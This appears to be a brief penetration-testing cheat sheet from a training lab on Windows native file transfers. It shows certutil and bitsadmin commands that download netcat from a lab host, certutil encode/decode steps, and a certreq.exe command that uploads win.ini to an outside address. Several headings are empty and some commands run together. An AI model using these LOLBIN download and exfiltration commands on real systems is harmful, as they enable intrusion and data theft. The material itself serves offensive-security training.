Windows Native Transfers
CertUtil
certutil.exe -urlcache -split -f http://10.10.10.32/nc.exe nc.exe
certutil.exe -verifyctl -split -f http://10.10.10.32/nc.execertutil.exe -encode nc.exe nc.txt
certutil.exe -urlcache -split -f "http://10.10.10.32/nc.txt" nc.txt
certutil.exe -decode nc.txt nc.exeBitsadmin
bitsadmin /transfer wcb /priority foreground http://10.10.10.32:8000/nc.exe C:\Users\htb-student\Desktop\nc.exeCertReq.exe Upload (LOLBIN)
certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.iniGfxDownloadWrapper.exe (LOLBIN)
RDP File Transfer
Mount Local Folder via xfreerdp / rdesktop
JavaScript Download (cscript.exe)
VBScript Download (cscript.exe)
References
Last updated